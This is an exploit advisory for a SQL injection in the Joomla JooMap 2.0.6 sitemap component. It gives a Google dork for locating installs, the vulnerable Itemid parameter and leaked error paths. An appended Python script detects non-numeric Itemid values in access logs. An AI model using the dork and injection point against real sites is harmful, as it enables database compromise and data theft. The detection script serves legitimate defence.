- ####################################################################
- # Exploit Title : Joomla JooMap Components 2.0.6 SQL Injection
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 30/01/2019
- # Vendor Homepage : joomlacode.org
- # Software Download Link : joomlacode.org/gf/download/frsrelease/3734/8340/joomap2.06pre.zip
- # Software Information Link : joomlacode.org/gf/project/joomap/
- # Software Version : 2.0.6 and previous versions
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Google Dorks : inurl:''/index.php?option=com_joomap''
- # Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
- # Reference Link : cxsecurity.com/issue/WLB-2019010303
- packetstormsecurity.com/files/151430/Joomla-JooMap-2.0.6-SQL-Injection.html
- ####################################################################
- # Description about Software :
- ***************************
- Joomap is a customizable sitemap component for Joomla.
- It shows all sections of a website in a hierarchical sitemap tree.
- It has support for Google Sitemaps XML generation and comes
- with a plugin-system to support adding categories from other components.
- ####################################################################
- # Impact :
- ***********
- The JooMap 2.0.6 component for Joomla! is prone to an SQL injection vulnerability
- because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application,
- access or modify data, or exploit latent vulnerabilities in the underlying database.
- ####################################################################
- # SQL Injection Exploit :
- **********************
- /index.php?option=com_joomap&Itemid=[SQL Injection]
- ####################################################################
- # Example Vulnerable Sites :
- *************************
- ####################################################################
- # Example SQL Database Error :
- ****************************
- Deprecated: Function ereg() is deprecated in /home/.sites/507/site1115/web/inhalt/administrator/components/com_joomap/plugins/content.plugin.php on line 247
- Deprecated: Assigning the return value of new by reference is deprecated in /homepages/30/d13404336/htdocs/info/includes/joomla.php on line 836
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
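For defenders running the affected component, the following is an added example (not part of the original advisory) that scans web access logs for `com_joomap` requests whose `Itemid` is not a plain integer. It assumes combined-format log lines and that legitimate `Itemid` values are numeric menu item IDs; the sample log lines and addresses are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line inside a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
INTEGER_RE = re.compile(r"[0-9]+")


def suspicious_itemid(url):
    """Return decoded Itemid values that are not plain integers for a
    com_joomap request; [] if the request is clean or unrelated."""
    # parse_qs percent-decodes values, so %27 is compared as a quote.
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    if "com_joomap" not in query.get("option", []):
        return []
    return [v for v in query.get("Itemid", []) if not INTEGER_RE.fullmatch(v)]


def scan(lines):
    """Return (line_number, client_ip, bad_values) for each flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        bad = suspicious_itemid(match.group(1))
        if bad:
            hits.append((number, line.split()[0], bad))
    return hits


# Constructed sample log lines (documentation-range addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [30/Jan/2019:10:00:01 +0000] '
    '"GET /index.php?option=com_joomap&Itemid=22 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [30/Jan/2019:10:00:05 +0000] '
    '"GET /index.php?option=com_joomap&Itemid=22%27 HTTP/1.1" 200 812',
    '198.51.100.7 - - [30/Jan/2019:10:00:09 +0000] '
    '"GET /index.php?option=com_content&Itemid=22%27 HTTP/1.1" 200 900',
    '203.0.113.5 - - [30/Jan/2019:10:01:00 +0000] '
    '"GET /index.php?Itemid=36abc&option=com_joomap HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for number, client, values in scan(SAMPLE_LOG):
        print(f"line {number}: {client} sent non-numeric Itemid {values!r}")
```

The same integer-only rule can be enforced ahead of the application, for example in a WAF or reverse-proxy rule, until the component is removed or replaced.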